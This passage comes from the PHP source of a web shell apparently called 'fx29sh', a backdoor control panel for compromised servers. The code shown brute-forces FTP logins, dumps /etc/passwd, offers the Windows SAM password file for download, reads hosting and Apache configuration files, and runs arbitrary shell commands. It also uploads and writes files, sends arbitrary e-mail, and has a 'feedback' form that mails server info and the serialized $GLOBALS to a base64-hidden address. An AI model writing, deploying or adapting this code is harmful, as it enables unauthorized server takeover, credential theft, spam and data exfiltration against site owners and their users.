1099         $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
1100         echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font class=on><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
1101         $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
1102         if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1103         if ($fqb_logemail) {@mail($fqb_logemail,"".sh_name()." report",$fqb_log);}
1104         fclose($fqb_logfp);
1105       }
1106     }
1107     else {
1108       $logfile = $tmp_dir."fx29sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
1109       $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
1110       echo "<form name=\"f_ftpqb\" action=\"".$surl."\">\n".
1111              "<input type=hidden name=act value=\"ftpquickbrute\">\n".
1112            "Read first:</td><td><input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"></td></tr>".
1113            "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"> Users only with shell</td></tr>".
1114            "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked>Logging</td></tr>".
1115            "<tr><td>Logging to file:</td><td><input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"></td></tr>".
1116            "<tr><td>Logging to e-mail:</td><td><input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"></td></tr>".
1117            "<tr><td colspan=2><input type=submit name=submit value=\"Brute\"></form>";
1118     }
1119     echo "</td></tr></table></center>";
1120   }
1121   ###[ SECURITY ]###
1122   if ($act == "security") {
1123 ?>
1124 
1125 
1126 <div class=barheader>.: Server Security Information :.</div>
1127 <table class="contents">
1128     <tr><td>Open Base Dir</td><td><?php echo $hopenbasedir; ?></td></tr>
1129     <td>Password File</td><td>
1130 <?php
1131     if (!is_windows()) {
1132       if ($nixpasswd) {
1133         if ($nixpasswd == 1) { $nixpasswd = 0; }
1134         if (!is_numeric($nixpwd_s)) { $nixpwd_s = 0; }
1135         if (!is_numeric($nixpwd_e)) { $nixpwd_e = $nixpwdperpage; }
1136 ?>
1137 
1138 
1139     *nix /etc/passwd:<br>
1140     <form name="f_pwd" action="<?php echo $surl; ?>">
1141         <input type="hidden" name="act" value="security">
1142         <input type="hidden" name="nixpasswd" value="1">
1143         <b>From:</b>
1144         <input type="text" name="nixpwd_s" value="<?php echo $nixpwd_s; ?>">
1145         <b>To:</b>
1146         <input type="text" name="nixpwd_e" value="<?php $nixpwd_e; ?>">
1147         <input type="submit" value="View">
1148     </form><br>
1149 <?php
1150         $i = $nixpwd_s;
1151         while ($i < $nixpwd_e) {
1152           $uid = posix_getpwuid($i);
1153           if ($uid) {
1154             $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
1155             echo "\t\t".join(":",$uid)."<br>\n";
1156           }
1157           $i++;
1158         }
1159       }
1160       else { echo "\t<a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b>View /etc/passwd</b></a>\n"; }
1161     }
1162     else {
1163       $v = $_SERVER["WINDIR"].'\repair\sam';
1164       if (file_get_contents($v)) {
1165         echo "\t<a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><b>Download password file</b></a>\n";
1166       }
1167     }
1168 ?>
1169 
1170 
1171     </td></tr>
1172     <tr><td>Config Files</td><td>
1173 <?php
1174     if (!is_windows()) {
1175       $v = array(
1176           array("User Domains","/etc/userdomains"),
1177           array("Cpanel Config","/var/cpanel/accounting.log"),
1178           array("Apache Config","/usr/local/apache/conf/httpd.conf"),
1179           array("Apache Config","/etc/httpd.conf"),
1180           array("Syslog Config","/etc/syslog.conf"),
1181           array("Message of The Day","/etc/motd"),
1182           array("Hosts","/etc/hosts")
1183       );
1184       $sep = "/";
1185     }
1186     else {
1187       $windir = $_SERVER["WINDIR"];
1188       $etcdir = $windir.'\system32\drivers\etc\\';
1189       $v = array(
1190           array("Hosts",$etcdir."hosts"),
1191           array("Local Network Map",$etcdir."networks"),
1192           array("LM Hosts",$etcdir."lmhosts.sam"),
1193       );
1194       $sep = "\\";
1195     }
1196     foreach ($v as $sec_arr) {
1197       $sec_f = substr(strrchr($sec_arr[1], $sep), 1);
1198       $sec_d = rtrim($sec_arr[1],$sec_f);
1199       $sec_full = $sec_d.$sec_f;
1200       $sec_d = rtrim($sec_d,$sep);
1201       if (file_get_contents($sec_full)) {
1202         echo "\t[ <a href=\"".$surl."act=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><b>".$sec_arr[0]."</b></a> ]\n";
1203       }
1204     }
1205 ?>
1206 
1207 
1208     </td></tr>
1209 <?php
1210     function dispsecinfo($name,$value) {
1211       if (!empty($value)) {
1212         echo "\t<tr><td>".$name."</td><td>\n".
1213             "<pre>".wordwrap($value,100)."</pre>\n".
1214             "\t</td></tr>\n";
1215       }
1216     }
1217     if (!is_windows()) {
1218       dispsecinfo("OS Version",fx29exec("cat /proc/version"));
1219       dispsecinfo("Kernel Version",fx29exec("sysctl -a | grep version"));
1220       dispsecinfo("Distrib Name",fx29exec("cat /etc/issue.net"));
1221       dispsecinfo("Distrib Name (2)",fx29exec("cat /etc/*-realise"));
1222       dispsecinfo("CPU Info",fx29exec("cat /proc/cpuinfo"));
1223       dispsecinfo("RAM",fx29exec("free -m"));
1224       dispsecinfo("HDD Space",fx29exec("df -h"));
1225       dispsecinfo("List of Attributes",fx29exec("lsattr -a"));
1226       dispsecinfo("Mount Options",fx29exec("cat /etc/fstab"));
1227       dispsecinfo("lynx installed?",fx29exec("which lynx"));
1228       dispsecinfo("links installed?",fx29exec("which links"));
1229       dispsecinfo("GET installed?",fx29exec("which GET"));
1230       dispsecinfo("Where is Apache?",fx29exec("whereis apache"));
1231       dispsecinfo("Where is perl?",fx29exec("whereis perl"));
1232       dispsecinfo("Locate proftpd.conf",fx29exec("locate proftpd.conf"));
1233       dispsecinfo("Locate httpd.conf",fx29exec("locate httpd.conf"));
1234       dispsecinfo("Locate my.conf",fx29exec("locate my.conf"));
1235       dispsecinfo("Locate psybnc.conf",fx29exec("locate psybnc.conf"));
1236     }
1237     else {
1238       dispsecinfo("OS Version",fx29exec("ver"));
1239       dispsecinfo("Account Settings",fx29exec("net accounts"));
1240       dispsecinfo("User Accounts",fx29exec("net user"));
1241     }
1242     echo "</table>\n";
1243   }
1244   ###[ MAKE FILE ]###
1245   if ($act == "mkfile") {
1246     if ($mkfile != $d) {
1247       if ($overwrite == 0) {
1248         if (file_exists($mkfile)) { echo "<b>FILE EXIST:</b> $overwrite ".htmlspecialchars($mkfile); }
1249       }
1250       else {
1251         if (!fopen($mkfile,"w")) { echo "<b>ACCESS DENIED:</b> ".htmlspecialchars($mkfile); }
1252         else { $act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {
1253                   $d .= DIRECTORY_SEPARATOR;
1254                     }
1255                     $f = basename($mkfile);
1256                 }
1257       }
1258     }
1259     else { disp_error("Enter filename!"); }
1260   }
1261   ###[ ENCODER ]###
1262   if ($act == "encoder") {
1263     if (!isset($encoder_input)) { $encoder_input = ""; }
1264 ?>
1265 
1266 
1267 <script language="javascript"> function set_encoder_input(text) { document.forms.encoder.input.value = text; }</script>
1268 <form name="encoder" action="<?php echo $surl; ?>" method=POST>
1269     <input type="hidden" name="act" value="encoder">
1270     <table class="contents">
1271         <tr><td colspan="4" class="barheader">.: Encoder :.</td></tr>
1272         <tr><td colspan="2">Input:</td><td><textarea name="encoder_input" id="input" cols="70" rows="5"><?php echo @htmlspecialchars($encoder_input); ?></textarea><br>
1273         <input type="submit" value="Calculate">
1274         </td></tr>
1275         <tr><td rowspan="4">Hashes:</td>
1276 <?php
1277     foreach(array("md5","crypt","sha1","crc32") as $v) {
1278 ?>
1279 
1280 
1281         <td><?php echo $v; ?>:</td><td><input type="text" size="50" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<?php echo $v($encoder_input); ?>" readonly>
1282         </td></tr>
1283         <tr>
1284 <?php
1285     }
1286 ?>
1287 
1288 
1289         </tr>
1290         <tr><td rowspan=2>Url:</td>
1291         <td>urlencode:</td><td><input type="text" size="35" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<?php echo urlencode($encoder_input); ?>" readonly>
1292         </td></tr>
1293         <tr><td>urldecode:</td><td><input type="text" size="35" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<?php echo htmlspecialchars(urldecode($encoder_input)); ?>" readonly>
1294         </td></tr>
1295         <tr><td rowspan=2>Base64:</td>
1296         <td>base64_encode:</td><td><input type="text" size="35" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<?php echo base64_encode($encoder_input); ?>" readonly>
1297         </td></tr>
1298         <tr><td>base64_decode:</td>
1299         <td>
1300 <?php
1301     if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {
1302 ?>
1303 
1304 
1305         <input type="text" size="35" value="Failed!" disabled readonly>
1306 <?php
1307     }
1308     else {
1309       $debase64 = base64_decode($encoder_input);
1310       $debase64 = str_replace("&#92;&#48;","[0]",$debase64);
1311       $a = explode("\r\n",$debase64);
1312       $rows = count($a);
1313       $debase64 = htmlspecialchars($debase64);
1314       if ($rows == 1) {
1315         echo "\t\t<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";
1316       }
1317       else {
1318         $rows++;
1319         echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";
1320       }
1321       echo " <a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\">[Send to input]</a>\n";
1322     }
1323     echo "\t\t</td></tr>\n".
1324          "\t\t<tr><td>Base convertations:</td><td>dec2hex</td><td>".
1325          "<input type=\"text\" size=\"35\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"\"";
1326     $c = strlen($encoder_input);
1327     for ($i=0;$i<$c;$i++) {
1328       $hex = dechex(ord($encoder_input[$i]));
1329       if ($encoder_input[$i] == "&") { echo $encoder_input[$i]; }
1330       elseif ($encoder_input[$i] != "\\") { echo "%".$hex; }
1331     }
1332     echo "\" readonly>\n";
1333 ?>
1334 
1335 
1336         </td></tr>
1337     </table>
1338 </form>
1339 <?php
1340   }
1341   ###[ FILESYSTEM BUFFER ]###
1342   if ($act == "fsbuff") {
1343     $arr_copy = $sess_data["copy"];
1344     $arr_cut = $sess_data["cut"];
1345     $arr = array_merge($arr_copy,$arr_cut);
1346     if (count($arr) == 0) {echo "<h2><center>Buffer is empty!</center></h2>";}
1347     else {
1348       $fx_infohead = "File-System Buffer";
1349       $ls_arr = $arr;
1350       $disp_fullpath = TRUE;
1351       $act = "ls";
1352     }
1353   }
1354   ###[ SELF REMOVE ]###
1355   if ($act == "selfremove") {
1356 ?>
1357 
1358 
1359 <div class="barheader">
1360     .: SELF KILL :.
1361     <hr size="1" noshade>
1362 <?php
1363     if ((@$submit == @$rndcode) && (@$submit != "")) {
1364       if (unlink(__FILE__)) { @ob_clean(); echo "Thanks for using ".sh_name()."!"; fx29shexit(); }
1365       else { disp_error("Can't delete ".__FILE__."!"); }
1366     }
1367     else {
1368       if (!empty($rndcode)) { disp_error("Error: Incorrect confirmation code!"); }
1369       $rnd = rand(0,9).rand(0,9).rand(0,9);
1370 ?>
1371 
1372 
1373 <form name="f_killshell" action="<?php echo $surl; ?>">
1374     <input type="hidden" name="act" value="selfremove">
1375     <input type="hidden" name="rndcode" value="<?php echo $rnd; ?>">
1376     Are you sure want to remove this shell ?<br>
1377     <?php disp_error(__FILE__); ?>
1378 
1379 
1380     <br>For confirmation, enter "<?php echo $rnd; ?>"<br>
1381     <input type="text" name="submit"><br>
1382     <input type="submit" value="KILL">
1383 </form>
1384 </div>
1385 <?php
1386     }
1387   }
1388   ###[ FEEDBACK ]###
1389   if ($act == "feedback") {
1390     $suppmail = base64_decode("ZmVlbGNvbXpAZ21haWwuY29t");
1391     if (!empty($submit)) {
1392       $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
1393       $body = sh_name()." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
1394       if (!empty($fdbk_ref)) {
1395         $tmp = @ob_get_contents();
1396         ob_clean();
1397         phpinfo();
1398         $phpinfo = base64_encode(ob_get_contents());
1399         ob_clean();
1400         echo $tmp;
1401         $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
1402       }
1403       mail($suppmail,sh_name()." feedback #".$ticket,$body,"FROM: ".$suppmail);
1404       echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
1405     }
1406     else {
1407 ?>
1408 
1409 
1410 <div class="barheader">.: Feedback or report bug (<?php echo str_replace(array("@","."),array("[at]","[dot]"),$suppmail); ?>) :.</div>
1411 <form name="f_feedback" action="<?php echo $surl; ?>" method="POST">
1412     <input type="hidden" name="act" value="feedback">
1413     <table class="contents">
1414         <tr><th>Your name:</th><td><input type="text" name="fdbk_name" value="<?php echo htmlspecialchars(@$fdbk_name); ?>"></td</tr>
1415         <tr><th>Your e-mail:</th><td><input type="text" name="fdbk_email" value="<?php echo htmlspecialchars(@$fdbk_email); ?>"></td></tr>
1416         <tr><th>Message:</th><td><textarea name="fdbk_body" cols=80 rows=10><?php echo htmlspecialchars(@$fdbk_body); ?></textarea>
1417         <input type="hidden" name="fdbk_ref" value="<?php echo urlencode($HTTP_REFERER); ?>"><br>
1418         <input type="checkbox" name="fdbk_servinf" value="1" checked> Attach Server info (Recommended for bug-fix)</td></tr>
1419         <tr><td></td><td><input type="submit" name="submit" value="Send"></td></tr>
1420     </table>
1421 </form>
1422 <?php
1423     }
1424   }
1425   ###[ PHP MAILER (By FaTaLisTiCz_Fx) ]###
1426   if ($act == "fxmailer") {
1427 ?>
1428 
1429 
1430     <div class="barheader">.: Mailer :.</div>
1431 <?php
1432     if (!empty($submit)){
1433       $headers  = 'To: '.$dest_email."\n";
1434       $headers .= 'From: '.$sender_name.' '.$sender_email."\n";
1435       if (mail($dest_email,$sender_subj,$sender_body,$headers)) {
1436         echo "<center><b>Email sent to $dest_email!</b></center>";
1437       }
1438       else { disp_error("Can't send email!"); }
1439     }
1440     else {
1441   ?>
1442 
1443 
1444 <form name="f_mailer" action="<?php echo $surl; ?>" method="POST">
1445     <input type="hidden" name="act" value="fxmailer">
1446     <table class="contents">
1447         <tr><th>Your name:</th><td><input type="text" name="sender_name" value="<?php echo @htmlspecialchars($sender_name); ?>"></td></tr>
1448         <tr><th>Your e-mail:</th><td><input type="text" name="sender_email" value="<?php echo @htmlspecialchars($sender_email); ?>"></td></tr>
1449         <tr><th>To:</th><td><input type="text" name="dest_email" value="<?php @htmlspecialchars($dest_email); ?>"></td></tr>
1450         <tr><th>Subject:</th><td><input size="70" type="text" name="sender_subj" value="<?php echo @htmlspecialchars($sender_subj); ?>"></td></tr>
1451         <tr><th>Message:</th><td><textarea name="sender_body" cols="80" rows="10"><?php echo @htmlspecialchars($sender_body); ?></textarea></td></tr>
1452         <tr><th></th><td><input type="submit" name="submit" value="Send"></td></tr>
1453     </table>
1454 </form>
1455 <?php
1456     }
1457   }
1458   ###[ SEARCH ]###
1459   if ($act == "search") {
1460 ?>
1461 
1462 
1463 <div class=barheader>.: Filesystem Search :.</div>
1464 <?php
1465     if (empty($search_in)) {$search_in = $d;}
1466     if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
1467     if (empty($search_text_wwo)) {$search_text_regexp = 0;}
1468     if (!empty($submit)) {
1469       $found = array();
1470       $found_d = 0;
1471       $found_f = 0;
1472       $search_i_f = 0;
1473       $search_i_d = 0;
1474       $a = array(
1475           "name"        => @$search_name,
1476           "name_regexp"    => @$search_name_regexp,
1477           "text"        => @$search_text,
1478           "text_regexp"    => @$search_text_regxp,
1479           "text_wwo"    => @$search_text_wwo,
1480           "text_cs"        => @$search_text_cs,
1481           "text_not"    => @$search_text_not
1482       );
1483       $searchtime = getmicrotime();
1484       $in = array_unique(explode(";",$search_in));
1485       foreach($in as $v) { fx29fsearch($v); }
1486       $searchtime = round(getmicrotime()-$searchtime,4);
1487       if (count($found) == 0) { echo "No files found!"; }
1488       else {
1489         $ls_arr = $found;
1490         $disp_fullpath = TRUE;
1491         $act = "ls";
1492       }
1493     }
1494 ?>
1495 
1496 
1497 <form name="f_search" method="POST">
1498     <input type="hidden" name="d" value="<?php echo $dispd; ?>">
1499     <input type="hidden" name="act" value="<?php echo $dspact; ?>">
1500     <table class="contents">
1501         <tr><th>File or folder Name:</th><td><input type="text" name="search_name" size="<?php echo round(strlen($search_name)+25); ?>" value="<?php echo htmlspecialchars($search_name); ?>"> <input type="checkbox" name="search_name_regexp" value="1" <?php echo (@$search_name_regexp == 1?" checked":""); ?>> Regular Expression</td></tr>
1502         <tr><th>Look in (Separate by ";"):</th><td><input type="text" name="search_in" size="<?php echo round(strlen($search_in)+25); ?>" value="<?php echo htmlspecialchars($search_in); ?>"></td></tr>
1503         <tr><th>A word or phrase in the file:</th><td><textarea name="search_text" cols="50" rows="5"><?php echo htmlspecialchars(@$search_text); ?></textarea></td></tr>
1504         <tr><th></th><td>
1505             <input type="checkbox" name="search_text_regexp" value="1" <?php echo (@$search_text_regexp == 1?" checked":""); ?>> Regular Expression
1506             <input type="checkbox" name="search_text_wwo" value="1" <?php echo (@$search_text_wwo == 1?" checked":""); ?>> Whole words only
1507             <input type="checkbox" name="search_text_cs" value="1" <?php echo (@$search_text_cs == 1?" checked":""); ?>> Case sensitive
1508             <input type="checkbox" name="search_text_not" value="1" <?php echo (@$search_text_not == 1?" checked":""); ?>> Find files NOT containing the text
1509         </td></tr>
1510         <tr><th></th><td><input type="submit" name="submit" value="Search"></td></tr>
1511     </table>
1512 </form>
1513 <?php
1514     if ($act == "ls") {
1515       $dspact = $act;
1516       echo $searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b>\n".
1517            "<hr size=\"1\" noshade>\n";
1518     }
1519   }
1520   ###[ CHMOD]###
1521   if ($act == "chmod") {
1522     $mode = fileperms($d.$f);
1523     if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
1524     else {
1525       $form = TRUE;
1526       if ($chmod_submit) {
1527         $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
1528         if (chmod($d.$f,$octet)) { $act = "ls"; $form = FALSE; $err = ""; }
1529         else {$err = "Can't chmod to ".$octet.".";}
1530       }
1531       if ($form) {
1532         $perms = parse_perms($mode);
1533         echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b>\n".
1534              "<br>".($err?"<b>Error:</b> ".$err:"")."\n".
1535              "<form name=\"f_chmod\" action=\"".$surl."\" method=POST>\n".
1536              "<input type=hidden name=d value=\"".htmlspecialchars($d)."\">\n".
1537              "<input type=hidden name=f value=\"".htmlspecialchars($f)."\">\n".
1538              "<input type=hidden name=act value=chmod>\n".
1539              "<table><tr>\n".
1540              "<td><b>Owner</b><br><br>\n".
1541              "<input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"")."> Read<br>\n".
1542              "<input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"")."> Write<br>\n".
1543              "<input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"")."> eXecute</td>\n".
1544              "<td><b>Group</b><br><br>\n".
1545              "<input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"")."> Read<br>\n".
1546              "<input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"")."> Write<br>\n".
1547              "<input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"")."> eXecute</td>\n".
1548              "<td><b>World</b><br><br>\n".
1549              "<input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"")."> Read<br>\n".
1550              "<input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"")."> Write<br>\n".
1551              "<input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"")."> eXecute</td>\n".
1552              "</tr>\n".
1553              "<tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr>\n".
1554              "</table>\n".
1555              "</form>\n";
1556       }
1557     }
1558   }
1559   ###[ UPLOAD ]###
1560   if ($act == "upload") {
1561     $uploadmess = "";
1562     $uploadpath = (isset($uploadpath)) ? str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath) : $d;
1563     if (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) { $uploadpath .= DIRECTORY_SEPARATOR; }
1564     if (!empty($submit)) {
1565       $uploadfile = $_FILES["uploadfile"];
1566       if (!empty($uploadfile["tmp_name"])) {
1567         if (empty($uploadfilename)) { $destin = $uploadfile["name"]; }
1568         else { $destin = $userfilename; }
1569         if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {
1570           $uploadmess .= "<div class=errmsg>Error uploading file ".$uploadfile["name"]." (Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!</div>";
1571         }
1572         else { $uploadmess .= "File uploaded successfully!<br>".$uploadpath.$destin; }
1573       }
1574       else { $uploadmess .= "<div class=errmsg>No file to upload!</div>"; }
1575     }
1576     echo $uploadmess;
1577     $act = "ls";
1578   }
1579   ###{ DELETE }###
1580   if ($act == "delete") {
1581     $delerr = "";
1582     foreach ($actbox as $v) {
1583       $result = FALSE;
1584       $result = fs_rmobj($v);
1585       if (!$result) { $delerr .= "Can't delete ".htmlspecialchars($v)."<br>"; }
1586     }
1587     if (!empty($delerr)) { disp_error("Error deleting:<br>$delerr"); }
1588     $act = "ls";
1589   }
1590   ###[ COPY ]###
1591   if ($act == "copy") {
1592     $err = "";
1593     $sess_data["copy"] = array_merge($sess_data["copy"],$actbox);
1594     fx29_sess_put($sess_data);
1595     $act = "ls";
1596   }
1597   ###[ CUT ]###
1598   elseif ($act == "cut") {
1599     $sess_data["cut"] = array_merge($sess_data["cut"],$actbox);
1600     fx29_sess_put($sess_data);
1601     $act = "ls";
1602   }
1603   ###[ UNSELECT ]###
1604   elseif ($act == "unselect") {
1605     foreach ($sess_data["copy"] as $k=>$v) {
1606       if (in_array($v,$actbox)) { unset($sess_data["copy"][$k]); }
1607     }
1608     foreach ($sess_data["cut"] as $k=>$v) {
1609       if (in_array($v,$actbox)) { unset($sess_data["cut"][$k]); }
1610     }
1611     fx29_sess_put($sess_data);
1612     $act = "ls";
1613   }
1614   ###[ EMPTY BUFFER ]###
1615   if (@$actemptybuff) { $sess_data["copy"] = $sess_data["cut"] = array(); fx29_sess_put($sess_data); }
1616   ###[ PASTE BUFFER ]###
1617   elseif (@$actpastebuff) {
1618     $psterr = "";
1619     foreach($sess_data["copy"] as $k=>$v) {
1620       $to = $d.basename($v);
1621       if (!fs_copy_obj($v,$to)) { $psterr .= "Can't copy ".$v." to ".$to."!<br>"; }
1622       if ($copy_unset) { unset($sess_data["copy"][$k]); }
1623     }
1624     foreach($sess_data["cut"] as $k=>$v) {
1625       $to = $d.basename($v);
1626       if (!fs_move_obj($v,$to)) { $psterr .= "Can't move ".$v." to ".$to."!<br>"; }
1627       unset($sess_data["cut"][$k]);
1628     }
1629     fx29_sess_put($sess_data);
1630     if (!empty($psterr)) { disp_error("Pasting with errors:<br>$psterr"); }
1631     $act = "ls";
1632   }
1633   ###[ ARCHIVE BUFFER ]###
1634   elseif (@$actarcbuff) {
1635     $arcerr = "";
1636     if (substr($actarcbuff_path,-7,7) == ".tar.gz") { $ext = ".tar.gz"; }
1637     else { $ext = ".tar.gz"; }
1638     if ($ext == ".tar.gz") { $cmdline = "tar cfzv"; }
1639     $cmdline .= " ".$actarcbuff_path;
1640     $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
1641     foreach($objects as $v) {
1642       $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
1643       if (substr($v,0,strlen($d)) == $d) { $v = basename($v); }
1644       if (is_dir($v)) {
1645         if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
1646         $v .= "*";
1647       }
1648       $cmdline .= " ".$v;
1649     }
1650     $tmp = realpath(".");
1651     chdir($d);
1652     $ret = fx29exec($cmdline);
1653     chdir($tmp);
1654     if (empty($ret)) { $arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>"; }
1655     $ret = str_replace("\r\n","\n",$ret);
1656     $ret = explode("\n",$ret);
1657     if ($copy_unset) { foreach($sess_data["copy"] as $k=>$v) { unset($sess_data["copy"][$k]); } }
1658     foreach($sess_data["cut"] as $k=>$v) {
1659       if (in_array($v,$ret)) { fs_rmobj($v); }
1660       unset($sess_data["cut"][$k]);
1661     }
1662     fx29_sess_put($sess_data);
1663     if (!empty($arcerr)) { disp_error("Archivation errors:<br>$arcerr"); }
1664     $act = "ls";
1665   }
1666   ###[ CMD ]###
1667   if ($act == "cmd") {
1668     @chdir($chdir);
1669     if (!empty($submit)) {
1670       echo "<div class=barheader>.: Command Output :.</div>\n";
1671       $olddir = realpath(".");
1672       @chdir($d);
1673       $ret = fx29exec($cmd);
1674       $ret = convert_cyr_string($ret,"d","w");
1675       if ($cmd_txt) {
1676         $rows = count(explode("\n",$ret))+1;
1677         if ($rows < 10) { $rows = 10; } else { $rows = 30; }
1678         $cols = 125;
1679         echo "<textarea class=\"shell\" cols=\"$cols\" rows=\"$rows\" readonly>".htmlspecialchars($ret)."</textarea>\n";
1680       }
1681       else { echo $ret."<br>"; }
1682       @chdir($olddir);
1683     }
1684   }
1685   ###[ PHP FILESYSTEM (By FaTaLisTiCz_Fx) ]###
1686   if ($act == "phpfsys") {
1687     echo "<div align=left>";
1688     $fsfunc = $phpfsysfunc;
1689     if ($fsfunc=="copy") {
1690       if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";}
1691       else { echo "<b>Success!</b> $arg1 copied to $arg2\n"; }
1692     }
1693     elseif ($fsfunc=="rename") {
1694       if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";}
1695       else { echo "<b>Success!</b> $arg1 renamed/moved to $arg2\n"; }
1696     }
1697     elseif ($fsfunc=="chmod") {
1698       if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";}
1699       else { echo "<b>Perm for $arg1 changed to $arg2!</b>\n"; }
1700     }
1701     elseif ($fsfunc=="read") {
1702       $darg = $d.$arg1;
1703       if ($hasil = @file_get_contents($darg)) {
1704         echo "<b>Filename:</b> ".$darg."<br>";
1705         echo "<center><textarea cols=125 rows=30>";
1706         echo htmlentities($hasil);
1707         echo "</textarea></center>\n";
1708       }
1709       else { disp_error("Couldn't open $darg"); }
1710     }
1711     elseif ($fsfunc=="write") {
1712       $darg = $d.$arg1;
1713       if(@file_put_contents($darg,$arg2)) {
1714         echo "<b>Saved!</b> ".$darg;
1715       }
1716       else { disp_error("Can't write to $darg!"); }
1717     }
1718     elseif ($fsfunc=="downloadbin") {
1719       $handle = fopen($arg1, "rb");
1720       $contents = '';
1721       while (!feof($handle)) {
1722         $contents .= fread($handle, 8192);
1723       }
1724       $r = @fopen($d.$arg2,'w');
1725       if (fwrite($r,$contents)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
1726       else { disp_error("Can't write to ".$d.$arg2."!"); }
1727       fclose($r);
1728       fclose($handle);
1729     }
1730     elseif ($fsfunc=="download") {
1731       $text = implode('', file($arg1));
1732       if ($text) {
1733         $r = @fopen($d.$arg2,'w');
1734         if (fwrite($r,$text)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
1735         else { disp_error("Can't write to ".$d.$arg2."!"); }
1736         fclose($r);
1737       }
1738       else { disp_error("Can't download from $arg1!");}
1739     }
1740     elseif ($fsfunc=='mkdir') {
1741       $thedir = $d.$arg1;
1742       if ($thedir != $d) {
1743         if (file_exists($thedir)) { echo "<b>Already exists:</b> ".htmlspecialchars($thedir); }
1744         elseif (!mkdir($thedir)) { echo "<b>Access denied:</b> ".htmlspecialchars($thedir); }
1745         else { echo "<b>Dir created:</b> ".htmlspecialchars($thedir);}
1746       }
1747       else { echo "Can't create current dir:<b> $thedir</b>"; }
1748     }
1749     elseif ($fsfunc=='fwritabledir') {
1750       function recurse_dir($dir,$max_dir) {
1751         global $dir_count;
